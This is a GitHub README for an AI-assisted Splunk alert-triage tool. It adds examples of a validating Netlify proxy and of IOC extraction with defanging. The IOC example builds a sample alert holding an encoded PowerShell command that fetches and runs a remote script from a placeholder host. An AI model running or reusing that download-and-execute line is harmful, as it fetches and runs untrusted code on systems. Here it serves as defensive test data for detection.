Qwortie/soc-triage-assistant
GitHub: Qwortie/soc-triage-assistant
An AI-driven Splunk alert triage tool that automates the verdict, MITRE mapping, IOC extraction and ticket generation.
Stars: 0 | Forks: 0
# 🛡️ SOC Triage Assistant
An AI-powered SOC analyst tool that takes a Splunk alert — either pasted as raw JSON or entered via a structured form — and generates a complete triage report in seconds. Built to accelerate Tier-1 SOC workflows by automating the initial analysis step.
**Live demo:** [soc-triage-qwort.netlify.app](https://soc-triage-qwort.netlify.app/)
## 🎯 What it does
Paste a Splunk alert and get back:
- **Verdict** — Confirmed Threat / Suspected Threat / Likely False Positive
- **MITRE ATT&CK mapping** — tactic, technique, and ID with direct link
- **IOC extraction** — all indicators defanged (`203.0.113[.]45`, `hxxp://`) so they cannot be clicked or auto-linked once pasted into a ticket
- **Containment actions** — numbered, specific, immediately actionable
- **Escalation decision** — should this go to the IR team?
- **Analyst notes** — caveats and things to verify manually
- **Exportable .md ticket** — ready to commit to your SOC ticket log
## 🏗️ Architecture
```
Browser (index.html)
↓ POST /alert data
Netlify Function (triage.js) ← API key stored as env variable
↓ POST /v1/messages
Claude API (claude-haiku)
↓ Structured JSON response
Browser renders triage report
```
The Claude API key is never exposed in the browser — all API calls are proxied through a Netlify serverless function. Proxying hides the key, but it does not by itself restrict who may call the function: anyone who can reach the deployed site can submit alerts and spend the key's quota, so for anything beyond a demo cap the request size and put rate limiting or access control in front of the function.
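The proxy described above, written out as an added example rather than the repository's own `triage.js`. It keeps the key in an environment variable, rejects oversized or malformed requests before spending any tokens, forwards the alert to the Messages API, and treats the model's reply as untrusted input by enforcing the report schema (fixed verdict set, well-formed technique ID, string arrays) before the browser sees it. Assumptions: Node 18+ (global `fetch`), the Netlify Functions v1 handler shape, and the model ID in `DEFAULT_MODEL`, which stands in for the page's "claude-haiku" and can be overridden with an `ANTHROPIC_MODEL` variable.

```javascript
// Added example (not the repository's triage.js): a Netlify-style function that
// forwards the browser's alert to the Anthropic Messages API with the key read
// from an environment variable, and validates the model's reply before the
// browser renders it. Assumptions: Node 18+ (global fetch), the Netlify
// Functions v1 handler shape ({ httpMethod, body }) -> { statusCode, headers, body },
// and the model id in DEFAULT_MODEL (override with ANTHROPIC_MODEL).

const ANTHROPIC_URL = "https://api.anthropic.com/v1/messages";
const DEFAULT_MODEL = "claude-3-5-haiku-latest"; // assumed id for the page's "claude-haiku"
const MAX_BODY_CHARS = 16 * 1024; // bounds prompt size, and so token spend, per call
const VERDICTS = ["Confirmed Threat", "Suspected Threat", "Likely False Positive"];
const JSON_HEADERS = { "content-type": "application/json" };

const SYSTEM_PROMPT =
  "You are a Tier-1 SOC analyst. Reply with ONLY a JSON object with keys: " +
  `verdict (one of: ${VERDICTS.join(" | ")}), mitre {tactic, technique, id}, ` +
  "iocs (defanged strings), containment (strings), escalate (boolean), notes (strings).";

function buildMessagesRequest(alertText, model) {
  return {
    model,
    max_tokens: 1024,
    system: SYSTEM_PROMPT,
    messages: [{ role: "user", content: "Triage this Splunk alert:\n\n" + alertText }],
  };
}

// Body must be JSON {"alert": <string or object>} within the size cap.
// Returns the alert as text, or null when the request should be rejected.
function parseIncoming(body) {
  if (typeof body !== "string" || body.length === 0 || body.length > MAX_BODY_CHARS) return null;
  let parsed;
  try { parsed = JSON.parse(body); } catch { return null; }
  if (!parsed || typeof parsed !== "object" || parsed.alert === undefined) return null;
  return typeof parsed.alert === "string" ? parsed.alert : JSON.stringify(parsed.alert);
}

// The model's text is untrusted input: strip an optional ```json fence, parse,
// and enforce the schema (fixed verdict set, Txxxx[.yyy] id, string arrays).
function parseTriageReport(text) {
  const fenced = /^\s*```(?:json)?\s*([\s\S]*?)\s*```\s*$/.exec(text);
  let r;
  try { r = JSON.parse(fenced ? fenced[1] : text); } catch { return null; }
  if (!r || typeof r !== "object" || !VERDICTS.includes(r.verdict)) return null;
  const strings = (v) => (Array.isArray(v) ? v.filter((s) => typeof s === "string") : []);
  const mitre = r.mitre && typeof r.mitre === "object" ? r.mitre : {};
  const id = typeof mitre.id === "string" && /^T\d{4}(\.\d{3})?$/.test(mitre.id) ? mitre.id : null;
  return {
    verdict: r.verdict,
    mitre: {
      tactic: String(mitre.tactic ?? ""),
      technique: String(mitre.technique ?? ""),
      id,
      // ATT&CK URLs use a slash between technique and sub-technique: T1110/003
      link: id ? `https://attack.mitre.org/techniques/${id.replace(".", "/")}/` : null,
    },
    iocs: strings(r.iocs),
    containment: strings(r.containment),
    escalate: r.escalate === true,
    notes: strings(r.notes),
  };
}

// Netlify calls handler(event, context); `deps` exists so tests can inject a
// fake fetch and env instead of hitting the real API.
async function handler(event, context, deps = { fetch: (...a) => globalThis.fetch(...a), env: process.env }) {
  const reply = (statusCode, obj) => ({ statusCode, headers: JSON_HEADERS, body: JSON.stringify(obj) });
  if (event.httpMethod !== "POST") return reply(405, { error: "method not allowed" });
  const apiKey = deps.env.ANTHROPIC_API_KEY;
  if (!apiKey) return reply(500, { error: "ANTHROPIC_API_KEY is not configured" });
  const alertText = parseIncoming(event.body);
  if (alertText === null) return reply(400, { error: 'expected JSON {"alert": ...} of at most 16K characters' });

  const res = await deps.fetch(ANTHROPIC_URL, {
    method: "POST",
    headers: { "x-api-key": apiKey, "anthropic-version": "2023-06-01", ...JSON_HEADERS },
    body: JSON.stringify(buildMessagesRequest(alertText, deps.env.ANTHROPIC_MODEL || DEFAULT_MODEL)),
  });
  // Report upstream failures by status only; the upstream body is not for the browser.
  if (!res.ok) return reply(502, { error: `upstream returned ${res.status}` });
  const data = await res.json();
  const text = (data.content || []).filter((c) => c.type === "text").map((c) => c.text).join("");
  const report = parseTriageReport(text);
  if (!report) return reply(502, { error: "model reply failed schema validation" });
  return reply(200, report);
}

if (typeof module !== "undefined") module.exports = { handler, parseIncoming, parseTriageReport, VERDICTS };
```

The schema check is the part worth keeping even if the rest is replaced: a model that drifts to a verdict outside the three the UI expects, or emits a malformed technique ID, fails closed with a 502 instead of reaching the renderer. The browser side should still insert every returned string as text (`textContent`, not `innerHTML`), since the IOC and note fields are model output, not trusted HTML.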
## 🧪 Sample alerts
The tool includes four preloaded sample alerts for demo purposes:
| Sample | MITRE technique | Source event |
|---|---|---|
| Password Spray | T1110.003 | Windows Security 4625 |
| Kerberoasting | T1558.003 | Windows Security 4769 |
| Encoded PowerShell | T1059.001 | Sysmon EID 1 |
| LSASS Memory Access | T1003.001 | Sysmon EID 10 |
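The IOC extraction and defanging promised in the feature list, and the Encoded PowerShell sample in the table above, as one added example that is not the project's own code (the project delegates this step to the model). A deterministic pass over the raw alert is a useful cross-check on the model's IOC list before anything is exported: it walks every string in a Splunk alert payload, decodes `-EncodedCommand` blobs (the sample hides its download URLs there), extracts IPs, domains, URLs and hashes, drops the analyst's own infrastructure, and defangs what is left. The alert is a constructed payload in the shape of Splunk's webhook alert action (`search_name`, `sid`, `result`, `results_link`); the field names inside `result` and the `.corp.example.com` internal suffix are assumptions. Requires Node 18+, no third-party packages.

```javascript
// Added example, not code from soc-triage-assistant: local IOC extraction and
// defanging over a Splunk alert, as a cross-check on the model's IOC list.
// Requires Node 18+ (Buffer, URL, catch without binding).

// Constructed sample (Splunk webhook shape). The "result" field names are an
// assumption about what the project's Sysmon EID 1 rule emits; the encoded
// command is built here so the base64 is exactly what powershell -enc expects.
const DECODED_COMMAND =
  "IEX (New-Object Net.WebClient).DownloadString('http://cdn-update.example.net/update.ps1'); " +
  "iwr http://203.0.113.77/stage2.ps1 -OutFile C:\\Users\\Public\\s2.ps1";
const ENCODED_COMMAND = Buffer.from(DECODED_COMMAND, "utf16le").toString("base64");

const SAMPLE_ALERT = {
  search_name: "Encoded PowerShell Execution",
  sid: "scheduler__admin__search__RMD5d41d8cd98f00b204_at_1709543722_188",
  results_link: "https://splunk.corp.example.com:8000/app/search/search?sid=1709543722.188",
  result: {
    _time: "2024-03-04T09:15:22Z",
    EventCode: "1",
    Computer: "ws-finance-07.corp.example.com",
    User: "CORP\\jdoe",
    Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    ParentImage: "C:\\Windows\\System32\\cmd.exe",
    CommandLine: `powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc ${ENCODED_COMMAND}`,
    // placeholder value (SHA-256 of the empty string), not a real sample hash
    Hashes: "SHA256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  },
};

// Hosts under these suffixes are the monitored estate, not indicators (assumed).
const INTERNAL_SUFFIXES = [".corp.example.com"];

const IPV4_RE = /\b(?:\d{1,3}\.){3}\d{1,3}\b/g;
const URL_RE = /\bhttps?:\/\/[^\s'"<>)]+/gi;
// Short TLD allowlist keeps file names such as powershell.exe out; extend as needed.
const DOMAIN_RE = /\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|info|biz|xyz|top|ru|cn|uk)\b/gi;
const HASH_RE = /\b(?:[a-f0-9]{64}|[a-f0-9]{40}|[a-f0-9]{32})\b/gi;
// powershell.exe accepts -e, -ec, -en, -enc ... -EncodedCommand (any prefix).
const ENCODED_FLAG_RE = /-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})/gi;

// Replace each -EncodedCommand blob with its decoded UTF-16LE content so the
// IOC regexes see the real command. Returns the expanded text plus the decoded
// commands (empty when nothing decoded cleanly).
function expandEncodedCommands(text) {
  const decoded = [];
  const expanded = text.replace(ENCODED_FLAG_RE, (whole, flag, blob) => {
    const f = flag.toLowerCase();
    if (f !== "ec" && !"encodedcommand".startsWith(f)) return whole; // e.g. -ErrorAction
    const buf = Buffer.from(blob, "base64");
    // -enc payloads are UTF-16LE; for ASCII scripts every odd byte is 0.
    // Heuristic: also rejects non-Latin payloads, not only random base64.
    const looksUtf16 = buf.length > 0 && buf.length % 2 === 0 && buf.every((b, i) => i % 2 === 0 || b === 0);
    if (!looksUtf16) return whole;
    const cmd = buf.toString("utf16le");
    decoded.push(cmd);
    return `-${flag} ${cmd}`;
  });
  return { text: expanded, decoded };
}

function stringValues(node, out = []) {
  if (typeof node === "string") out.push(node);
  else if (node && typeof node === "object") Object.values(node).forEach((v) => stringValues(v, out));
  return out;
}

const unique = (arr) => [...new Set(arr || [])];
const isInternal = (host) => INTERNAL_SUFFIXES.some((s) => host === s.slice(1) || host.endsWith(s));
const hostOf = (url) => { try { return new URL(url).hostname; } catch { return ""; } };

// Raw (un-defanged) indicators from every string in the alert, internal hosts removed.
function extractIocs(alert) {
  const expanded = stringValues(alert).map(expandEncodedCommands);
  const corpus = expanded.map((e) => e.text).join("\n");
  return {
    ips: unique(corpus.match(IPV4_RE)).filter((ip) => ip.split(".").every((o) => Number(o) <= 255)),
    domains: unique((corpus.match(DOMAIN_RE) || []).map((d) => d.toLowerCase())).filter((d) => !isInternal(d)),
    urls: unique(corpus.match(URL_RE)).filter((u) => !isInternal(hostOf(u))),
    hashes: unique((corpus.match(HASH_RE) || []).map((h) => h.toLowerCase())),
    decodedCommands: expanded.flatMap((e) => e.decoded),
  };
}

// Defang so the ticket cannot be clicked or auto-linked: 1.2.3.4 -> 1[.]2[.]3[.]4,
// http://host/path -> hxxp://host[.]tld/path (only scheme and host are touched).
const defangHost = (h) => h.replace(/\./g, "[.]");
function defangUrl(url) {
  const u = new URL(url);
  return `${u.protocol.replace(/^http/, "hxxp")}//${defangHost(u.host)}${u.pathname}${u.search}`;
}
const refang = (s) => s.replace(/^hxxp/, "http").replace(/\[\.\]/g, ".");

function defangedIocs(alert) {
  const iocs = extractIocs(alert);
  return { ...iocs, ips: iocs.ips.map(defangHost), domains: iocs.domains.map(defangHost), urls: iocs.urls.map(defangUrl) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(defangedIocs(SAMPLE_ALERT), null, 2));
}
```

Running the block prints the decoded script and four defanged indicators; note that the two download URLs and the staging IP exist only inside the base64 blob, so a report built from the visible command line alone would miss them. Comparing this list against the model's `iocs` field is a cheap way to catch an omitted or un-defanged indicator before the `.md` ticket is committed.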
## 🚀 Deployment
### Prerequisites
- Netlify account (free tier works)
- Anthropic API key from [console.anthropic.com](https://console.anthropic.com)
### Steps
1. Fork or clone this repo
2. Deploy to Netlify (drag and drop the folder, or connect via GitHub)
3. In Netlify → Site configuration → Environment variables, add:
   - Key: `ANTHROPIC_API_KEY`
   - Value: your API key
4. Trigger a redeploy so the function picks up the new variable
### Local development
```
npm install -g netlify-cli
netlify dev
# open http://localhost:8888
```
## 📁 Repository layout
```
soc-triage-assistant/
├── index.html # Frontend — form, JSON input, results UI
├── README.md
└── netlify/
└── functions/
└── triage.js # Serverless proxy — calls Claude API
```
## 🔗 Related repositories
- [SOC-Home-Lab](https://github.com/Qwortie/SOC-Home-Lab) — Lab environment these alerts come from
- [splunk-detection-rules](https://github.com/Qwortie/splunk-detection-rules) — SPL rules that generate these alerts
- [Phishing-tickets](https://github.com/Qwortie/Phishing-tickets) — Manual ticket format this tool automates
Tags: AI security, API key security, Claude API, Cloudflare, IOC extraction, Kerberoasting, LSASS memory access, Markdown export, MITRE ATT&CK, MITRE mapping, Netlify, encoded PowerShell, SOAR, T1003, T1059, T1110, T1558, binary releases, backend development, alert triage, threat intelligence, security operations center, password spraying, developer tools, open-source tools, data visualization, serverless functions, server-side proxy, sample alerts, emulator, browser-side, demo samples, ticketing system, structured form, network mapping, automated analysis, false positives, cross-site scripting